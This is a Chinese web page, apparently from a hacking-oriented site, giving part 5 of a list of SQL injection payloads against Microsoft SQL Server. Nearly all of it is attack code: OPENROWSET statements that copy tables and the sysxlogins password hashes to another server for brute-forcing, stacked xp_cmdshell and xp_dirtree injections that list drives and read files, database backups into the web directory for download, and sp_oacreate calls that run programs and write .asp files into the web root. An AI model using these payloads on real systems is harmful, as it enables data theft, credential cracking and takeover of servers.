常用的SQL 注射语句解析(5)_SQL SERVER数据库_黑客防线网安服务器维护基地--Powered by WWW.RONGSEN.COM.CN

常用的SQL 注射语句解析(5)

作者:黑客防线网安SQL维护基地 来源:黑客防线网安SQL维护基地 浏览次数:0

本篇关键词:解析语句注射常用
黑客防线网安网讯:   insert into  OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select  * from _sysobjects')  select * from us...
   insert into
  OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select
  * from _sysobjects')
  select * from user_database.dbo.sysobjects
  insert into
  OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select
  * from _syscolumns')
  select * from user_database.dbo.syscolumns
  
  复制数据库:
  insert into
  OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select
  * from table1') select * from database..table1
  insert into
  OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select
  * from table2') select * from database..table2
  复制哈西表(HASH)登录密码的hash存储于sysxlogins中方法如下:
  insert into OPENROWSET('SQLOLEDB',
  'uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from
  _sysxlogins') select * from database.dbo.sysxlogins
  得到hash之后就可以进行暴力破解
  遍历目录的方法: 先创建一个临时表:temp
  ';create table temp(id nvarchar(255),num1 nvarchar(255),num2
  nvarchar(255),num3 nvarchar(255));--
  ';insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
  ';insert into temp(id) exec master.dbo.xp_subdirs 'c:';-- 获得子目录列表
  ';insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:';--
  获得所有子目录的目录树结构,并寸入temp表中
  ';insert into temp(id) exec master.dbo.xp_cmdshell 'type
  c:webindex.asp';-- 查看某个文件的内容
  ';insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:';--
  ';insert into temp(id) exec master.dbo.xp_cmdshell 'dir c: *.asp /s/a';--
  ';insert into temp(id) exec master.dbo.xp_cmdshell 'cscript
  C:InetpubAdminScriptsadsutil.vbs enum w3svc'
  ';insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:';--
  (xp_dirtree适用权限PUBLIC)
  写入表:
  语句1:and 1=(Select IS_SRVROLEMEMBER('sysadmin'));--
  语句2:and 1=(Select IS_SRVROLEMEMBER('serveradmin'));--
  语句3:and 1=(Select IS_SRVROLEMEMBER('setupadmin'));--
  语句4:and 1=(Select IS_SRVROLEMEMBER('securityadmin'));--
  语句5:and 1=(Select IS_SRVROLEMEMBER('securityadmin'));--
  语句6:and 1=(Select IS_SRVROLEMEMBER('diskadmin'));--
  语句7:and 1=(Select IS_SRVROLEMEMBER('bulkadmin'));--
  语句8:and 1=(Select IS_SRVROLEMEMBER('bulkadmin'));--
  语句9:and 1=(Select IS_MEMBER('db_owner'));--
  把路径写到表中去:
  ;create table dirs(paths varchar(100), id int)--
  ;insert dirs exec master.dbo.xp_dirtree 'c:'--
  and 0<>(select top 1 paths from dirs)--
  and 0<>(select top 1 paths from dirs where paths not in('@Inetpub'))--
  ;create table dirs1(paths varchar(100), id int)--
  ;insert dirs exec master.dbo.xp_dirtree 'e:web'--
  and 0<>(select top 1 paths from dirs1)--
  把数据库备份到网页目录:下载
  ;declare @a sysname; set @a=db_name();backup database @a to
  disk='e:webdown.bak';--
  and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where
  xtype=char(85)) T order by id desc)
  and 1=(Select Top 1 col_name(object_id('USER_LOGIN'),1) from sysobjects)
  参看相关表。
  and 1=(select user_id from USER_LOGIN)
  and 0=(select user from USER_LOGIN where user>1)
  -=- wscript.shell example -=-
  declare @o int
  exec sp_oacreate 'wscript.shell', @o out
  exec sp_oamethod @o, 'run', NULL, 'notepad.exe'
  '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec
  sp_oamethod @o, 'run', NULL, 'notepad.exe'--
  declare @o int, @f int, @t int, @ret int
  declare @line varchar(8000)
  exec sp_oacreate 'scripting.filesystemobject', @o out
  exec sp_oamethod @o, 'opentextfile', @f out, 'c:oot.ini', 1
  exec @ret = sp_oamethod @f, 'readline', @line out
  while( @ret = 0 )
  begin
  print @line
  exec @ret = sp_oamethod @f, 'readline', @line out
  end
  declare @o int, @f int, @t int, @ret int
  exec sp_oacreate 'scripting.filesystemobject', @o out
  exec sp_oamethod @o, 'createtextfile', @f out,
  'c:inetpubwwwrootfoo.asp', 1
  exec @ret = sp_oamethod @f, 'writeline', NULL,
  ''
  declare @o int, @ret int
  exec sp_oacreate 'speech.voicetext', @o out
  exec sp_oamethod @o, 'register', NULL, 'foo', 'bar'
  exec sp_oasetproperty @o, 'speed', 150
  exec sp_oamethod @o, 'speak', NULL, 'all your sequel servers are belong
  to,us', 528
  waitfor delay '00:00:05'
  '; declare @o int, @ret int exec sp_oacreate 'speech.voicetext', @o out
  exec sp_oamethod @o, 'register', NULL, 'foo', 'bar' exec sp_oasetproperty
  @o, 'speed', 150 exec sp_oamethod @o, 'speak', NULL, 'all your sequel
  servers are belong to us', 528 waitfor delay '00:00:05'--
  xp_dirtree适用权限PUBLIC
  exec master.dbo.xp_dirtree 'c:'
  返回的信息有两个字段subdirectory、depth。Subdirectory字段是字符型depth字段是整形字段。
  create table dirs(paths varchar(100), id int)
  建表,这里建的表是和上面xp_dirtree相关连,字段相等、类型相同。
  insert dirs exec master.dbo.xp_dirtree 'c:'
  只要我们建表与存储进程返回的字段相定义相等就能够执行!达到写表的效果,一步步达到我们想要的信息!
    黑客防线网安服务器维护方案本篇连接:http://www.rongsen.com.cn/show-11422-1.html
网站维护教程更新时间:2012-03-21 03:21:23  【打印此页】  【关闭
我要申请本站N点 | 黑客防线官网 |  
专业服务器维护及网站维护手工安全搭建环境,网站安全加固服务。黑客防线网安服务器维护基地招商进行中!QQ:29769479

footer  footer  footer  footer